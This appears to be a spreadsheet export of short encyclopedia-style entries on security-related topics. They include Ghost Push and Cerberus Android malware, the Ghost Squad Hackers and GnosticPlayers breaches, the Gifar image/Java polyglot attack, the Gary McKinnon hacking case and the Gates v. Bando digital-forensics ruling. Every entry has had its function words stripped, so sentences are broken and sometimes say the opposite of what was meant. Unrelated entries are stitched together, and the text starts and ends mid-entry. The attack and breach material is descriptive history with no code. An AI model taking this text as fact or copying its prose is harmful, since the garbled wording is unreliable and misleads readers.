2017. release update released september 2017, added support ext4 filesystem. symantec ghost solution suite (ghost 12.0) ghost software enterprise, including ghost 12.0 deployment solution 6.9, released october 2018. this release added support ghost solution suite console, ipxe, windows server 2016, smart imaging, native drive support. features ghost marketed deployment solution. capture deployment environment requires booting windows environment. this accomplished creating burn dvd) bootable disk, installed client automation folder delivered server. this provides environment perform offline system recovery image creation. ghost mount backup volume recover individual files. ghost copy contents volume another convert volume contents virtual disk vmdk format. initially, ghost supported file system, although could copy (but resize) file systems performing sector-by-sector transfer. ghost added support ntfs later 1996, also provided program, ghostwalker, change security (sid) made windows systems distinguishable other. ghostwalker capable modifying name windows computer interface. ghost added support ext2 file system 1999 ext3 subsequently. support ext4 added september 2017. discontinuation norton ghost discontinued april 2013. support chat knowledge base available june 2014. until removed, symantec ghost page invited ghost customers symantec system recovery, described software backup disaster recovery. also comparison disk cloning software references external links symantec ghost solution suite (previously norton ghost enterprise edition) product page symantec news</t>
  </si>
  <si>
    <t>Ghost Push</t>
  </si>
  <si>
    <t>ghost push family malware infects android automatically gaining root access, downloading malicious unwanted software. malware appears discovered september 2015 security research cheetah mobile, subsequently developed diagnostic software determine whether device compromised. september 2015, twenty variants circulation. latter versions employed routines made harder detect remove.the malware hogs system resources, making phone slow, draining battery consuming cellular data. advertisements continually appear either full partial screen status bar. applications installed malware appear difficult remove, impervious anti-virus software even surviving factory reset device.infection typically comes downloading applications third-party stores, least thirty-nine applications identified carriers. peak, ghost push virus infected 600,000 devices daily, infections occurring india, well indonesia philippines, ranking second third. malware discovered september 2015 cheetah mobile's security research lab. references</t>
  </si>
  <si>
    <t>Ghost Squad Hackers</t>
  </si>
  <si>
    <t>ghost squad hackers abbreviation "gsh" politically motivated hacktivist team responsible conducting cyber attacks central banks, news cnn, leaking sensitive data united states armed forces, leaking sensitive data israeli government, hijacking afghanistan's chief executive's twitter account, much more. administrative facto leader known s1ege (leet "siege"). group's prime intent focus embedded anti-governmental organization cyber protests within current involvements media speculation real life happenings 2021 present.they also team part hacktivist group anonymous. list attacks governments organizations defacements ethiopian government january 2016, defaced ethiopian government websites response killing nearly students activists ethiopian security forces protests became extremely violent involved latter part 2015 sparked august october 2016 ethiopian protests. attacks donald trump 2016 targeted donald trump's official website launching distributed denial service (ddos) attacks racist comments made towards refugees mexicans. shortly targeting trump's official website shut trump's hotel collection websites. attacks israeli defense force group gained notoriety successfully leaked data israeli defense force april 2016. this #opisrael launched along anonymous, leaking database israel defense force posting thousands soldiers, border patrol, israeli force personnel information online. attacks klux klan april 2016 targeted loyal white knights klux klan taking websites protest racism anonymous protests happening state georgia, u.s.a. attacks black lives matter 2016, took official website black lives matter, claiming organization fueled racism. attacks banks anonymous worked correlation together "operation icarus" first launched february 2016. aimed attacking central banking system attackers accused banks corruption wanted raise public awareness. this attack sparked invitation hacking teams affiliations anonymous focus attention towards central banks direct regards scrutiny cyber attacks.ghost squad hacker's leader s1ege claimed responsibility attacks carried bank england email server dozens banking websites including york stock exchange, bank france, bank greece, bank jordan bank south korea, among others. s1ege went state want "start online revolution" retaliate "elite banking cartels putting world perpetual state chaos." hundreds banks targeted operation exact number banks affected unknown. attacks cnn, news notoriety group continued escalate heat turned month june, 2016. after censoring media coverage regards opisrael, opsilence initiated targeting mainstream media outlets news. data leakage armed forces/military data dump later leaked hacking united states military personnel files releasing information close 2,437 army personnel. information contained link uploaded onion link dark along paste-bin link contained credit card numbers personal information u.s. army personnel. defacement baton rouge city government website july 2016 domain baton rouge city government website hacked twice previously making news attack towards blm. these attacks however targeting city baton rouge, louisiana protest police brutality city native alton sterling shot killed baton rouge police officers earlier month. baton rouge website defaced along picture alton sterling message read, "being black crime! this shooting alton sterling, he's black mean guy. pay. justice. ghost squad hackers. /r.i.p. alton sterling". attacks afghanistan government officials july 2016 took official twitter account afghanistan's chief executive abdullah abdullah effort raise awareness corruption alleged drug deals afghanistan u.s. they also targeted afghan public credit registry website defacing also allowed access several social media accounts including abdullah's tweeted, "afghanistan hacked ghostsquadhackers #cheifexecutiveofficer hear now? twitter.com/afgexecutive. found exploit government server pulled every login could. also abdullah using phone restriction enabled".the attacks afghan government continued relentlessly first september prior targeting afghanistan's chief executive twitter account, assaulted government defacing twelve websites affiliated afghan government. this included afghanistan's ministry justice, ministry defense, ministry foreign affairs, ministry refugees repatriations, afghan attorney general's office. further assaults continued hopes raising awareness palestine part opsilence opisrael shutting israeli prime minister bank israel. operation decrypt isis group's focus 2017 shifted slightly towards targeting isis removing internet social media completely. multitude accounts facebook, twitter, telegram alike hacked added extensive list isis removed. further efforts later revealed bomb instructions plans carried isis.s1ege stated really care attacking u.s. elections. they've already hacked. mostly hack isis" interview news year 2018.on february 2019 s1ege released massive leak islamic state telegram whatsapp group's/channel's administrators. leak included hacked phones/mobile devices, hacked telegram accounts, hacked facebook's, hacked twitter accounts, credit cards, geolocation data, government issued cards, logs belonging administrators. group successfully infiltrated islamic state community encrypted communication applications exposed administrators using malware exploits. leak published mega.nz ghost squad hackers official twitter account. telegram whatsapp admins (riffat mahmood khan) former taxi driver living auburn linked isis accused administering group's encrypted messages. traveled syria support islamic state 2015. returned conflict zone turkey months later, promptly picked australian federal police officers airport flew september 2015. video footage raids obtained herald showed wife children away home uniformed police, officers swarm auburn home. believed actually participated fighting syria, spent time radical group returning allegedly continuing work caliphate. remained involved islamic state's encrypted online messaging continued take care whatsapp telegram groups radical islamic group uses communicate internally recruiting. documents leaked showed several accused isis supporter's children enrolled local islamic school bayan. attended south granville mosque noor, sources suggest became radicalized. images hacked phone exposed depicted isis flag flying venice, explosions, blood-stained knives, children brandishing isis flags, meme saying 'one bullet away paradise' critically wounded soldiers. leaked data showed belgian (siraj moussaoui), known isis supporter, video phone effectively behead someone. siraj moussaoui tried vain join islamic state 2016 arrested shortly suspicion plotting attack belgium. defacements indian government starting april 2020 conducted large number mass defacements government websites well root ownership indian government server leaked data australian government. this also included governments australia, india various others. twitter feed shared multitude alleged attacks various government websites pandemic using hashtags associated previous campaigns #freejulianassange.in june group claimed responsibility hacking indian government websites protest internet jammu kashmir. gave warning livewire interview saying people jammu kashmir, support efforts continue back pandemic tyrannical government's grip. india's government persistent, persistent consistent. region/state/ethnic group access internet, even limited access. these basic civil rights liberties.” defacements european space agency (esa) group defaced european space agency (esa) website https://business.esa.int july 2020. claimed attack fun. they explained exploited server-side request forgery (ssrf) remote code execution vulnerability server, gained access business.esa.int server defaced having interest leaking data intent solely show server vulnerable. within week hacking business domain defaced https://space4rail.esa.int website well. defacements idaho state websites july 2020 successfully targeted idaho state websites servers locking agencies servers. idaho government websites targeted included idaho supreme court, idaho court, idaho parks recreation, idaho stem action center, victims group. sites used broadcast messages referencing julian assange, founder wikileaks, charged violating espionage act. messages read “free julian assange! journalism crime.” data leakage various sheriff/police departments september 2020 claimed responsibility breach vermont sheriff's association, resulted data leak names, addresses, financial data communications between/to various vermont sheriffs. leaked data published retaliation shootings various individuals fell victim police brutality; including george floyd, jacob blake, breonna taylor. references</t>
  </si>
  <si>
    <t>Ghostball (computer virus)</t>
  </si>
  <si>
    <t>ghostball first multipartite virus discovered. virus discovered october 1989, friðrik skúlason. virus capable infecting executable .com-files boot sectors. virus written based code different viruses. code capable infecting files stated inspired modified version vienna virus. section virus capable infecting boot sectors extracted ping-pong virus. also timeline notable computer viruses worms comparison computer viruses computer virus malware multipartite virus references</t>
  </si>
  <si>
    <t>Ghostwriter (hacker group)</t>
  </si>
  <si>
    <t>ghostwriter also known unc1151 hacker group allegedly originating belarus. according cybersecurity firm mandiant, group spread disinformation critical nato since least 2016. history name ghostwriter comes group's first attacks, whereby would steal credentials journalists publishers publish fake articles using credentials. hence, group effectively became unwanted ghostwriters stolen credentials. unc1151 internal company name mandiant given uncategorized groups "cyber intrusion activity."the european union blamed group hacking german government officials. eu's foreign policy chef josep borrell threatened russia sanctions.according serhiy demedyuk, deputy secretary national security defense council ukraine, group responsible defacement ukrainian government websites january 2022.in february 2022 register reported ukrainian cert announced group targeting "private ‘i.ua’ ‘meta.ua’ [email] accounts ukrainian military personnel related individuals" part phishing attack invasion ukraine. mandiant said domains mentioned cert, i[.]ua-passport[.]space id[.]bigmir[.]space known command control domains group. mandiant also said able infrastructure reported cert.ua unc1151, seen phishing messages directly. however, unc1151 targeted ukraine especially military extensively past years, activity matches historical pattern." characteristics techniques group executed spear-phishing campaigns members legitimate press infiltrate content management systems organizations. then, group uses system publish fake stories. references</t>
  </si>
  <si>
    <t>Gifar</t>
  </si>
  <si>
    <t>graphics interchange format java archives (gifar) term files combined file format. gifars could uploaded sites allow image uploading, though part legitimate code site. java patched update published december 2008.in attack, java archive files (gifars) uploaded sites understanding gifs, file interpreted file viewed executed. this circumvented same-origin policy browsers impose; bypassing content validation usually used. attackers reference malicious image applet code hosted site, establishing cross-domain communication (your) target domain. this technique worked images store header beginning file, files archive-based format) store data tail. this attack unique gifs jars; general class vulnerabilities file type combinations .doc, .jpg, etc. gifar allowed attacker access victim's http cookies. this allows session hijacking, victim's logged-in user accounts accessed. gifars executed user viewing image; interpreted run. attack work, victim must logged site hosting image. site includes login sessions user-uploaded pictures vulnerable. java archives (jars) files collections compiled java code, intended executed standalone programs. they archives mostly containing java class files. developers create extract files using command comes jdk. file format allows metadata comment occur file central directory. zips, central directory specifies offset file respect start, possible first file entry start offset zero. this allows arbitrary data occur file archive data, archive still read application. side effect possible author file working archive another format; provided format tolerates arbitrary data beginning, middle, end. self-extracting archives (sfx) form supported winzip dotnetzip, take advantage this—they .exe files conform pkzip appnote.txt specification read compliant tools libraries. this property format (including jars) exploited hide harmful java classes inside seemingly normal file, image uploaded web. so-called "gifar" exploit demonstrated effective attack applications facebook.this made possible allow "considered-safe" site java. example, webmaster could host file site saying applet—or attacking party could upload gifar image host; end-user's browser would applet stated safe. although would mitigated attack, developers digitally sign files. case, signature becomes part (embedded) manifest file. signed, every file inside archive listed, along file's signed checksum. multiple entities sign file (which changes file signing). when java runtime loads signed files, validates signature(s) avoids classes match. end-users jars signed trusted parties, malicious code cannot inserted run. gifars, java recognizes part applet victim's browser though written site's developers. though patched java vulnerability advisory #244988 versions update (december 2008), update 1.4.2_19)., users installed versions java pre-dating patch, issue needs addressed issue browser security. sun's patch not, however, stop applications taking ownership user-supplied content. from sun; “...applets allowed open network connections computer, except host provided .class files.” capable uploading gifar site validate images. include embed pointing gifar another page (hosted anywhere) make people stumble onto allowed make network connections wants site name. with applet running, attacker access victim's account. gifs graphics interchange format (gif) based bitmap image format introduced compuserve 1987. declined world wide continues wide support. images compressed using lempel-ziv-welch (lzw) lossless data compression technique reduce file size without degrading visual quality. stores multiple images file. this technique used extensively produce simple animations. first image formats commonly used sites. compuserve's appeared 1987 provide color image format replace run-length encoding (rle) format, black white xbm. became popular could data compression, enabled large images downloaded short time. jpeg came later, mosaic browser. solutions some solutions issue surfer, update latest version jre. webmasters cannot ensure customers protected cannot control version users run. host images, backend script verifies absence files appended vulnerable file types (reference http://securethoughts.com/2009/01/easy-server-side-fix-for-the-gifar-security-issue solution could help developer filter malicious content server side). application able restrict upload malicious files, solves problem without worrying version client running. this ultimately application issue. when chooses take ownership user-controlled file, serving domain, weakens integrity domain. impact attacks could also minimized applications took user-controlled files served files “throw away” domain. application developer, also prevent types attacks using separate domain user-influenced files. references external links explained file overview</t>
  </si>
  <si>
    <t>Gigabyte (virus writer)</t>
  </si>
  <si>
    <t>kimberley vanvaeck, also known online moniker gigabyte, virus writer belgium known long-standing dispute involved internet security firm sophos employees, graham cluley. vanvaeck wrote several viruses, including quis, coconut yahasux (also called sahay). also created sharp virus (also called "sharpei"), credited first virus written c#.vanvaeck's dispute cluley began made several comments concerning gender virus writers. this prompted vanvaeck write several viruses specifically targeted cluley stated written proof-of-concept rather releasing wild. references external links official website</t>
  </si>
  <si>
    <t>Glassbox</t>
  </si>
  <si>
    <t>glassbox israeli software company. sells session-replay analytics software services. history october 2018, glassbox raised us$32.5 million capital funding. exchange investing glassbox, washington, equity firm updata partners given glassbox board seats. april 2020, glassbox raised us$40 million series funding.in october 2020, glassbox acquired rival sessioncam. privacy concerns last year, published expose glassbox’s adopted customers, fully disclosing customers online actions monitored tracked name quality control; sensitive data sucked process. turns story open cracks help glassbox, customers, platform operators like apple google case apps) page well tools worked, when. from least early october 2018, glassbox promoted software allowing customers' websites mobile apps "see exactly customers real time". this prompted twitter users express privacy concerns glassbox's software.in february 2019, techcrunch reported numerous popular applications apple's store used glassbox software record users' activities without users' informed consent, compromised users' privacy contravened rules store. affected apps included ones published abercrombie fitch, canada, expedia, hollister, hotels.com, singapore airlines.in response, apple told developers continued flout rules store, apps would removed however, clear whether apple's request heeded.following techcrunch's investigation, security researchers symantec's enterprise mobile threat division found apps android apps employed glassbox software, including number banking credit card apps, "putting user's financial information risk exposure". google, whose play store android counterpart store, comment whether would expect android developers remove session-replay functionality.anti-malware company avast observed using session-replay analytics "without even mentioning right, probably illegal countries." computer science professor thomas keenan, author book technocreep, suggested people want company record data like delete concerned. reported glassbox retains session, demographic, location data months, categorizing age, gender, interests, combine information obtained companies. references</t>
  </si>
  <si>
    <t>Glomar response</t>
  </si>
  <si>
    <t>united states law, term glomar response, also known glomarization glomar denial, refers response request information "neither confirm deny" (ncnd) existence information sought. example, response request police reports relating certain individual, police agency respond following: neither confirm deny agency records matching request." national subnational freedom information policies, governments often required tell people request information (e.g. journalists attorneys) whether located requested records, even records kept secret. times, government determine mere truthfully disclosing records exist would pose actual possible harm, national security, integrity ongoing investigation person's privacy. example, disclosing police department documents current investigation criminal conspiracy, even content documents disclosed, would make public investigation happening could help suspects destroy evidence. glomar responses commonly associated united states freedom information (foia), generally dictates federal agencies must disclose information. term "glomar" originated association foia law. lower courts thus ruled glomar response potential merit secretive nature material truly requires agency provides much information possible" justify claim. otherwise, principles established foia outweigh claims secrecy. origin term phrase itself, "neither confirm deny", long appeared frequently news reports, alternative comment" response respondent wish answer. 1911, example, boston maine railroad told boston globe would "neither confirm deny" reports future plans. 1916, ford representatives said would "neither confirm deny" price cuts offing popular model-t automobile. when governor kansas questioned 1920 report addressing state official's potential ouster, responded would "neither confirm deny" report's existence. "glomar" response usns hughes glomar explorer large salvage vessel built central intelligence agency (cia) covert "project azorian"—an attempted salvaging sunken soviet submarine. february 1975, aware pending publication story angeles times, sought stop story's publication. journalist harriet phillippi requested provide disclosure glomar project attempts censor story, chose "neither confirm deny" project's existence attempts keep story unpublished. this claim stood, phillippi's freedom information (foia) request rejected, though ford administration replaced carter administration 1977 1976 presidential election, government position particular case softened phillippi's claims confirmed.the "glomar response" precedent still stood, since bearing foia cases 2004 lawsuit american civil liberties union department defense, wherein federal judge alvin hellerstein rejected department defense cia's glomar response refusing release documents photos depicting abuse ghraib prison. "glomar" syllabic abbreviation global marine, company commissioned build glomar explorer. according radiolab podcast, original text glomar response written associate general counsel cia, pseudonym walt logan. divulge soviet union either knew know, response read: neither confirm deny existence information requested but, hypothetically, data exist, subject matter would classified, could disclosed. original text cia's reply 1975, phillippi's foia request, seems been: duckett determined that, interest national security, involvement u.s. government activities subject matter request neither confirmed denied. therefore, determined fact existence non-existence material documents exist would reveal connection interest activities glomar explorer duly classified secret accordance criteria established executive order 11652. acknowledgement existence non-existence information request could reasonably expected result compromise important intelligence operations significant scientific technological developments relating national security, might also result disruption foreign relations significantly affecting national security. 2014, opened twitter account with, neither confirm deny first tweet." also comment policy deliberate ambiguity plausible deniability warrant canary references external links "project jennifer hughes glomar explorer". federation american scientists.</t>
  </si>
  <si>
    <t>Cerberus (Android)</t>
  </si>
  <si>
    <t>cerberus trojan horse targeting android mobile phone banking credentials. history initially spotted june 2019. spotted targeting spanish latin american targets september 2019. attacks capable stealing google authenticator tokens, behavior spotted february 2020. april 2020, variants spotted posing covid-19-related apps.cerebus capable logging keystrokes (including passwords) stealing tokens google authenticator messages. also allows remote control device using teamviewer. sold malware service underground forums. references</t>
  </si>
  <si>
    <t>GnosticPlayers</t>
  </si>
  <si>
    <t>gnosticplayers computer hacking group, believed formed 2019 gained notability hacking zynga, canva, several online services.the independent reported gnosticplayers claimed responsibility hacking online businesses, stealing hundreds millions credentials databases myfitnesspal, dubsmash, fourteen others; subsequently selling credentials dark web. reported members 2020 night lion security listed people members gnosticplayers. maxime tallet, went aliases ddb, casper, rawdata, pumpkin seller group. nassim benhaddou went aliases prosox member group, known gabriel's early associate.in 2019, nassim benhaddou, gabriel kimiaie-asadi bildstein, well maxime tallet, arrested gabriel self confessed hacked gatehub. hack reportedly involved theft $9.5 million worth cryptocurrency. however, night lion security believes gnosticplayers behind hack. companies affected according night lion security, gnosticplayers breached following companies:500px 8fit 8tracks animoto armor games artsy avito blankmediagames bookmate bukalapak canva chegg coffeemeetsbagel coinmama coubic dailybooth datacamp dubsmash edmodo epic games evite eyeem fotolog gamesalad gatehub ge.tt gfycat hautelook houzz icracked ixigo legendas.tv lifebear live journal loveplanet mefeedia mindjolt myfitnesspal myheritage myvestigage netlog twoo omgpop onebip overblog petflow pizap promofarma roadtrippers roll20 sharethis shein singlesnet storenvy storybird streeteasy stronghold kingdoms taringa wanelo whitepages wirecard yanolja yatra younow youthmanual zomato zynga night lion security says gnosticplayers involved non-credit card related data breaches january 2017 june 2020. also shinyhunters dark overlord references</t>
  </si>
  <si>
    <t>GoBack</t>
  </si>
  <si>
    <t>norton goback (previously wildfile goback, adaptec goback, roxio goback) disk utility microsoft windows record disk changes. when filesystem idle seconds, marks "safe points". product allows disk drive restored point within available history. also allows older versions files restored, previous versions whole disk browsed. depending disk activity, typical history might cover hours days. operation goback replaces master boot record, also replaces partition table single partition. this allows hard drive changed back, even event operating system unable boot, also protecting filesystem alteration revert information remains correct. goback compatible hardware raid drives. incompatible products changes made partition table, cause problems dual booting operating systems hard disk. possible retain dual-boot compatibility, involve saving partition table enabling goback, enabling goback, re-writing partition table back disk (after booting different device, live cd). also necessary disable goback prior using certain level disk utilities, formatting software. such level utilities first check presence goback combination goback) cause data become corrupted. another example incompatible program windows version true image windows. goback also incompatible products drive vaccine restore rollback products require access master boot record. usage precaution several users cnet reviews reported data loss installing product. cnet gave norton goback editors' rating five stars, average user rating stars. norton goback support hard drive partitions higher. symantec, norton goback compatible windows vista. product history goback designed wild file, inc., company located plymouth, minnesota. software shown comdex november 1998 released december 1998. patent technology issued january 2000. march 2000: adaptec, inc., acquires wild file approximately million. april 2001: adaptec creates spin-off company, roxio, inc., retains goback product. 2001: roxio goback deluxe released, time also supporting ntfs filesystem, used widely since release windows august 2001: symantec corp. announces norton systemworks 2002 includes goback personal edition roxio. april 2003: roxio sells goback symantec million. september 2004: norton goback released symantec included norton systemworks 2005. november 2007: symantec releases vista-compatible version norton systemworks 2008 (11.0) longer contains goback, premier edition systemworks includes norton save restore 2.0. march 2009: symantec, norton goback replaced norton ghost (norton ghost however missing functions norton goback had). awards 2000: adaptec goback receives magazine editors' choice award. june 2003: goback deluxe receives magazine editors' choice award. june 2004: norton goback receives magazine editors' choice award. august 2005: norton goback receives magazine editors' choice award. competing products windows steadystate (discontinued) deep freeze also data recovery references</t>
  </si>
  <si>
    <t>Gazelle (Internet company)</t>
  </si>
  <si>
    <t>ecoatm, business gazelle ecommerce company founded 2006 helps people donate used electronic devices, cellular phones mobile phones smart tablets laptop computers company, instances offer money consumers used broken smart devices. headquartered diego, california operations louisville, kentucky. history gazelle founded 2006 israel ganot, rousseau aurelien, james mcelhiney. gazelle.com launched 2008 raised million funding venrock, rockport capital, physic ventures craton equity partners. company's corporate office located diego, employees. june 2013, consumer electronics retailer opened first processing center louisville, warehouse operates employees. 2013, company topped $100 million revenue, growing percent rate. november 2014, gazelle launched store sell certified pre-owned devices direct consumers.since launching, gazelle paid $200 million consumers used devices, accepted million devices million customers.on november 2015 gazelle's acquisition outerwall inc., owner ecoatm, another electronics recycler, became official.in december 2020, gazelle announced trade-in program would shut february 2021. recognition awards gazelle reached millionth gadget milestone 2014. 2012, gazelle ranked within inc. fastest growing companies three years row. 2012, gazelle ranked consumer products services companies, massachusetts companies, boston metro area. also electronic waste united states references external links gazelle</t>
  </si>
  <si>
    <t>Goat file</t>
  </si>
  <si>
    <t>cryptovirology, goat file sacrificial program file used computer virus testing, contains copy known computer virus released injected machine's memory file executed. etymology goat files named similar sacrifice goat antiquity file lost order virus studied, considered minimal loss goat files easily assimilated. references</t>
  </si>
  <si>
    <t>Gates Rubber Company v. Bando Chemical Industries, Ltd., et al</t>
  </si>
  <si>
    <t>gates rubber company bando chemical industries, ltd., decision u.s. district court district colorado 1996. considered landmark decision terms expert witness court testimony questions electronic evidence digital forensics. nutshell, decision states authenticity electronic evidence accepted courts party adducing evidence complied newest technical standards electronic evidence acquisition. moreover, u.s. magistrate judge schlatter commented factors considered relevant process weighing qualifications digital forensics experts present contrary opinions conclusions court. hence, gates bando legal standards examining electronic evidence remained relevant day. facts case gates rubber company bando chemical industries involved manufacture industrial belts direct competitors. several defendants aside bando former employees gates, signed written non-competition agreements left company. 1989, gates learned latter used computer program highly similar own, gates suspected former employees stolen, copied used bando. accordingly, gates filed several actions grounds unfair competition, misappropriation trade secrets, infringement copyright, breach contract.during court proceedings, 1992 gates learned former employees, deleted computer program computer bando, gates claimed unauthorized copy copyright-protected software own. furthermore, (and actually decisive regards influence digital forensics trial), also "deleted" several word-processing files computer, testifying erase materials relevant pending litigation. consequently, gates applied disclosure, order examine whether defendant maliciously deleted files attempt destroy evidence. court granted gates court order allowed gates copy hard drive newman's computer order obtain much information possible "deleted", reconstructible files. gates assigned technician execute copying hard drive, whereas subsequently also appeared gate's expert witness court procedure. retrospect, technical method applied create copy hard drive n.'s computer well formal professional qualification digital forensics expert (particularly comparison expert witness summoned defendant) turned crucial aspects decisive outcome gates claims arising bando's alleged violation disclosure obligations spoliation. acquisition electronic evidence course examination, copied software onto hard drive n.'s computer (which contained evidentiary electronic files), order create file-by-file copy hard drive. this conduct induced court extensively comment forensic methods must applied electronic evidence allow used piece evidence court procedure: first, court stated general rule digital forensic examiner shall obliged "utilize method would yield complete accurate results" order comply legal prerequisites regard admissibility evidence court procedure. result, several organizations started continuously publish best practice literature electronic evidence acquisition. however, kept mind best practise prerequisite must considered dynamic procedural hurdle, technical requirements possibilities analyzing copying digital data change underlying hard- software, consequently technical procedures applied order create legally permissible piece electronic evidence change future. second, judge held file-by-file copying procedure applied gates' forensic examiner fails fulfil court's "best practice" requirement. instead, necessary forensic investigation lege artis copy hard drive means creating image (or: mirror) copy: "gates retained technician copying, attempted program called norton's unerase. proper program could yield information, partial pictures, files present computer's hard drive, deleted. gates argued adequate copying denver computer. (the defendant's expert witness, remark author) persuaded however, lost, failed capture, important information inadequate effort. using norton's unerase, unnecessarily copied program onto denver computer first, thereby overwrote percent hard drive commencing efforts copy contents... additionally, obtain creation dates certain files overwrote deleted files. this information would assisted determining deletion date files. pointed done "image backup" hard drive, would collected every piece information hard drive, whether information allocated file not. instead, "file file" backup, copies existing, nondeleted files hard drive. technology image backup available time events, though rarely used anyone... find duty gates, bando, utilize best technology available."the standards outlined become general standards computer forensic examination. according statements, electronic data, recovered computer hard disk form electronic storage unit digital information) permitted used court procedures only, data duplicated verified forensically sound manner. forensic examiner gates bando (v.) failed create forensically sound duplication since installation examiner's software could overwritten existing files hard drive, constitution evidence altered even copy made. correct duplication, however, requires alteration data process copying reliably excluded. this requires that: image exact, bit-by-bit duplicate original computer drive, image taken guarantee original changed, image examined guarantee image changed.in practise, proper duplication usually warranted write-blocking original storage device. correct verification means electronic evidence presented court must provably identical originally investigated, usually warranted means hash value, algorithm calculated number based content respective piece electronic evidence. present, compliance "best practise" requirement usually achieved using proprietary software imaging, admittedly preserve evidential value electronic information recovered. assessment evidential value expert witness testimony digital forensics experts expert qualifications considered lawyers experts important, case gates bando, court reaffirms widely accepted belief. judge schlatter stated context: "bando's expert matters associated computer science holds ph.d. computer science stanford. w.'s credentials, experience knowledge impressive, relied upon opinions. gates failed obtain similar expert timely fashion. gates offer testimony technician hired gates copy hard drive computer bando's denver facility. credentials, experience knowledge nowhere near placed much less weight testimony w.'s."the court strongly relied experts' formal professional qualification, obviously distinguishable criterion case. however, cases litigation unambiguous. then, factor expert's actual professional appearance including limited ability impart non-legal knowledge court, thoroughness report traceability expert's inferences play larger role. additionally, major practical issue judges dealing issues electronic evidence remains lack measurability expertise, partly absence uniform formal professional qualification field. lessons future case gates bando surely highlights necessity selecting given digital forensics expert carefully comes civil litigation involving digital evidence issues, expert's opinion often turns decisive outcome case. parties' diligence cases even goes further: selection expert witness litigation stage, already pre-litigation phase attorneys experts obliged ensure correct acquisition electronic evidence potentially relevant case. moreover, develop apply evidential reasoning could professionally withstand opponent forensic expert's testimony factually persuade judge and/or jury courtroom. apart that, course court procedure (relatively early) illustrated potential economic impact e-discovery issues litigation: originally initiated secondary theatre litigation, issues soon snowballed case finally achieved economically temporally dimensions exceeding original matter dispute. today, corporate information stored electronically. typically enough, digital forensics become business estimated market value mio. 2011. generally speaking, outcome increasing number cases fields depend issues digital evidence.to extent gates bando illustrates necessity litigation parties carefully plan execute sophisticated strategy terms electronic evidence, however, must realized ultimately describes recurrent practical problem: relating tools techniques progress courts (presumably) carry demand application best method available warrant electronic evidence's authentity, absence commonly court-accepted standards emerge again. potential solution litigators avoid repeated occurrence issue might entering pre-trial agreements opponent, agree upon certain conditions mutual recognition electronic documents' authenticity. also computer forensics electronic evidence expert witnessreliability digital evidence general: united states scholle, f.2d 1109 (8th cir. 1976) united states vela, f.2d (5th cir. 1982) united states bonallo, 1427 (1988) john paul mitchell sys. quality king distribs., inc., supp. 462, (s.d.n.y. 2000) schaghticoke tribal nation kempthorne, supp. 389, (d.conn. 2008)authentification e-mails: kearley mississippi, (miss. app. october 2002) fenje feld, 2003 lexis 24387 (n.d. ill., december 2003) people downin, n.e. (ill. app. ct., april 2005) united states safavian, 2006 u.s. dist. lexis 32284 (d.d.c. 2006) scheuplein city covina, 2009 cal. app. unpub. lexis 7805 (cal. app. sept. 2009)authentification electronic document printouts: united states melenberg, f.3d 1177 (10th cir. 2001) people markowitz, n.y.s.2d (sup. february 2001) bank eurich, n.e. (s.j.c mass., august 2005) united states lebowitz, supp.2d 1336 (n.d. 2009)authentification website-content: perfect inc. cybernet ventures, supp. 1146 (c.d. cal. 2002) telewizja polska usa, inc, echostar satellite, 2004 2367740 (n.d. ill. oct. 2004) hutchens hutchens-collins, 2006 lexis 87187 ore. nov. 2006) lorraine markel american insurance co., f.r.d. 2007) williams long, 2008 4848362 md., november 2008). references external links http://www.infolaw.co.uk/newsletter/category/electronic-evidence/ http://ials.sas.ac.uk/publish/deeslr/deeslr.htm http://www.techrepublic.com/blog/it-security/so-you-want-to-be-a-computer-forensics-expert/</t>
  </si>
  <si>
    <t>Gary McKinnon</t>
  </si>
  <si>
    <t>gary mckinnon (born february 1966) scottish systems administrator hacker accused 2002 perpetrating "biggest military computer hack time", although mckinnon states merely looking evidence free energy suppression cover-up activity technologies potentially useful public. october 2012, series legal proceedings britain, home secretary theresa blocked extradition united states. alleged crime mckinnon accused hacking united states military nasa computers 13-month period february 2001 march 2002, house girlfriend's aunt london, using name 'solo'.us authorities stated deleted critical files operating systems, shut united states army's military district washington network 2000 computers hours. mckinnon also posted notice military's website: "your security crap". after september attacks 2001, allegedly deleted weapons logs earle naval weapons station, rendering network computers inoperable paralyzing munitions supply deliveries navy's atlantic fleet. mckinnon also accused copying data, account files passwords onto computer. authorities stated cost tracking correcting problems caused $700,000.while admitting constituted evidence destruction, mckinnon admit leaving threat computer: foreign policy akin government-sponsored terrorism days mistake huge security stand september last year solo. continue disrupt highest levels authorities stated mckinnon trying downplay actions. senior military officer pentagon told sunday telegraph: policy fight attacks strongly possible. result mckinnon's actions, suffered serious damage. this harmless incident. serious deliberate damage military nasa computers left silly anti-america messages. evidence someone staging serious attack computer systems. arrest legal proceedings mckinnon first interviewed police march 2002. after interview, computer seized authorities. interviewed august 2002, time national hi-tech crime unit (nhtcu).in november 2002, mckinnon indicted federal grand jury eastern district virginia. indictment contained seven counts computer-related crime, carried potential ten-year jail sentence. extradition proceedings mckinnon remained liberty without restriction three years june 2005 (until enacted extradition 2003, implemented 2003 extradition treaty united states wherein united states need provide contestable evidence), became subject bail conditions including requirement sign local police station every evening remain home address night. extradited u.s. charged, mckinnon would faced years jail. also expressed fears could sent guantanamo bay. appeal house lords representing mckinnon house lords june 2008, barristers told lords prosecutors said mckinnon faced possible 8–10 years jail count contested charges (there seven counts) without chance repatriation, 37–46 months co-operated went voluntarily united states. u.s.-style plea bargains part english jurisprudence (although standard practice reduce sentence one-third defendant pleads guilty).mckinnon's barrister said lords could deny extradition abuse process: united states wish processes english courts secure extradition alleged offender, must play rules."the house lords rejected argument, lead judgement lord brown eaton-under-heywood) holding "the difference american system perhaps stark [mckinnon]'s argument suggests" extradition proceedings "accommodate legal cultural differences legal systems many foreign friendly states entered reciprocal extradition arrangements". further appeals mckinnon appealed european court human rights, briefly imposed extradition.on january 2009, mckinnon permission high court apply judicial review extradition. july 2009, high court announced mckinnon lost appeal. british government blocks extradition october 2012, then-home secretary theresa announced house commons extradition blocked, saying that:mr mckinnon accused serious crimes. also doubt seriously asperger's syndrome, suffers depressive illness. mckinnon's extradition would give rise high risk ending life decision extradite would incompatible mckinnon's human rights.she stated director public prosecutions would determine whether mckinnon face trial british court. december, dpp, keir starmer, announced mckinnon would prosecuted united kingdom, difficulties involved bringing case evidence united states. judicial review january 2010, justice mitting granted mckinnon judicial review decision home secretary alan johnson allow mckinnon's extradition. mitting distinguished issues arguable, first whether psychiatrist jeremy turk's opinion mckinnon would certainly commit suicide extradited means home secretary must refuse extradition section human rights 1998 (which prevents public authority acting incompatible convention rights). second whether turk's opinion fundamental change circumstances courts previously considered 